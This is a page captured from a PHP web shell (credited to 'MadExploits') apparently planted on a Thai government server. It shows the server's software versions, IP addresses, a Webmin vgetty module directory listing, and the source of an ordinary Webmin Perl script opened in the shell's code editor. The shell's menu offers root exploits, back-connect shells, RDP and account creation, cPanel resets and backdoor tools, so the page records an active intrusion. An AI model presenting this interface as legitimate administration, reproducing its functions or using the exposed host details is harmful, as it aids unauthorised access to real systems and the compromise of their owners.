Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
libexec /
webmin /
vgetty /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
backup_config.pl
923
B
-rwxr-xr-x
config
63
B
-rw-r--r--
config.info
109
B
-rw-r--r--
config.info.ca
127
B
-rw-r--r--
config.info.ca.UTF-8
131
B
-rw-r--r--
config.info.cz
121
B
-rw-r--r--
config.info.cz.UTF-8
124
B
-rw-r--r--
config.info.de
119
B
-rw-r--r--
config.info.de.UTF-8
119
B
-rw-r--r--
config.info.es
139
B
-rw-r--r--
config.info.es.UTF-8
139
B
-rw-r--r--
config.info.hu
119
B
-rw-r--r--
config.info.hu.UTF-8
127
B
-rw-r--r--
config.info.ms_MY
111
B
-rw-r--r--
config.info.ms_MY.UTF-8
111
B
-rw-r--r--
config.info.nl
113
B
-rw-r--r--
config.info.nl.UTF-8
113
B
-rw-r--r--
config.info.no
108
B
-rw-r--r--
config.info.no.UTF-8
108
B
-rw-r--r--
config.info.pl
129
B
-rw-r--r--
config.info.pl.UTF-8
133
B
-rw-r--r--
config.info.ru.UTF-8
169
B
-rw-r--r--
config.info.ru_RU
115
B
-rw-r--r--
config.info.ru_RU.UTF-8
169
B
-rw-r--r--
config.info.ru_SU
115
B
-rw-r--r--
config.info.uk_UA
120
B
-rw-r--r--
config.info.uk_UA.UTF-8
169
B
-rw-r--r--
delete.cgi
1.31
KB
-rwxr-xr-x
edit_options.cgi
4.85
KB
-rwxr-xr-x
edit_vgetty.cgi
2.78
KB
-rwxr-xr-x
email.pl
1018
B
-rwxr-xr-x
index.cgi
1.41
KB
-rwxr-xr-x
install_check.pl
387
B
-rwxr-xr-x
list_messages.cgi
2.48
KB
-rwxr-xr-x
list_received.cgi
1.87
KB
-rwxr-xr-x
list_vgetty.cgi
1.18
KB
-rwxr-xr-x
listen.cgi
511
B
-rwxr-xr-x
log_parser.pl
749
B
-rwxr-xr-x
module.info
172
B
-rw-r--r--
module.info.ca
115
B
-rw-r--r--
module.info.ca.UTF-8
128
B
-rw-r--r--
module.info.cz
25
B
-rw-r--r--
module.info.cz.UTF-8
31
B
-rw-r--r--
module.info.de
91
B
-rw-r--r--
module.info.de.UTF-8
103
B
-rw-r--r--
module.info.es
45
B
-rw-r--r--
module.info.es.UTF-8
51
B
-rw-r--r--
module.info.hu
27
B
-rw-r--r--
module.info.hu.UTF-8
34
B
-rw-r--r--
module.info.ms_MY
126
B
-rw-r--r--
module.info.ms_MY.UTF-8
138
B
-rw-r--r--
module.info.nl
25
B
-rw-r--r--
module.info.nl.UTF-8
31
B
-rw-r--r--
module.info.no
25
B
-rw-r--r--
module.info.no.UTF-8
31
B
-rw-r--r--
module.info.pl
31
B
-rw-r--r--
module.info.pl.UTF-8
38
B
-rw-r--r--
module.info.ru.UTF-8
57
B
-rw-r--r--
module.info.ru_RU
34
B
-rw-r--r--
module.info.ru_RU.UTF-8
60
B
-rw-r--r--
module.info.ru_SU
34
B
-rw-r--r--
save_options.cgi
3.9
KB
-rwxr-xr-x
save_vgetty.cgi
3.09
KB
-rwxr-xr-x
upload.cgi
1.78
KB
-rwxr-xr-x
vgetty-lib.pl
4.3
KB
-rwxr-xr-x
vgetty_apply.cgi
228
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : edit_vgetty.cgi
#!/usr/bin/perl # edit_vgetty.cgi # Display the vgetty configuration for some serial port require './vgetty-lib.pl'; &ReadParse(); &foreign_require("inittab", "inittab-lib.pl"); if ($in{'new'}) { &ui_print_header(undef, $text{'vgetty_create'}, ""); } else { &ui_print_header(undef, $text{'vgetty_edit'}, ""); @vgi = &vgetty_inittabs(); ($init) = grep { $_->{'id'} eq $in{'id'} } @vgi; } print "<form action=save_vgetty.cgi>\n"; print "<input type=hidden name=new value='$in{'new'}'>\n"; print "<input type=hidden name=id value='$in{'id'}'>\n"; print "<table border width=100%>\n"; print "<tr $tb> <td><b>$text{'vgetty_header'}</b></td> </tr>\n"; print "<tr $cb> <td><table width=100%>\n"; print "<tr> <td><b>$text{'vgetty_tty'}</b></td>\n"; print "<td colspan=3><select name=tty>\n"; $found++ if ($in{'new'}); opendir(DEV, "/dev"); foreach $t (sort { "$a$b" =~ /^ttyS(\d+)ttyS(\d+)$/ ? $1 <=> $2 : 0 } readdir(DEV)) { if ($t =~ /^ttyS(\d+)$/) { local $f = $init->{'tty'} eq $t || $init->{'tty'} eq "/dev/$t"; printf "<option value=%s %s>%s</option>\n", $t, $f ? "selected" : "", &text('vgetty_ts', $1+1); $found++ if ($f); } } closedir(DEV); printf "<option value='' %s>%s</option>\n", $found ? "" : "selected", $text{'vgetty_other'}; print "</select>\n"; printf "<input name=other size=20 value='%s'> %s</td> </tr>\n", $found ? "" : $init->{'tty'}, &file_chooser_button("other"); @conf = &get_config(); $rings = &find_value("rings", \@conf); if ($rings =~ /^\//) { $tf = $in{'new'} ? undef : &tty_opt_file($rings, $init->{'tty'}); print "<tr> <td><b>$text{'vgetty_rings'}</b></td>\n"; printf "<td><input type=radio name=rings_def value=1 %s> %s\n", -r $tf ? "" : "checked", $text{'vgetty_default'}; printf "<input type=radio name=rings_def value=0 %s> %s\n", -r $tf ? "checked" : ""; open(TF, $tf); chop($rc = <TF>); close(TF); print "<input name=rings size=5 value='$rc'></td> </tr>\n"; } $ans = &find_value("answer_mode", \@conf); if ($ans =~ /^\//) { $tf = $in{'new'} ? undef : &tty_opt_file($ans, $init->{'tty'}); print "<tr> <td><b>$text{'vgetty_ans'}</b></td>\n"; printf "<td><input type=radio name=ans_def value=1 %s> %s\n", -r $tf ? "" : "checked", $text{'vgetty_default'}; printf "<input type=radio name=ans_def value=0 %s> %s\n", -r $tf ? "checked" : ""; open(TF, $tf); chop($am = <TF>); close(TF); print &answer_mode_input($am, "ans"),"</td> </tr>\n"; } print "</table></td></tr></table>\n"; print "<table width=100%><tr>\n"; if ($in{'new'}) { print "<td><input type=submit value='$text{'create'}'></td>\n"; } else { print "<td><input type=submit value='$text{'save'}'></td>\n"; print "<td align=right><input type=submit name=delete ", "value='$text{'delete'}'></td>\n"; } print "</table></form>\n"; &ui_print_footer("list_vgetty.cgi", $text{'vgetty_return'});
Close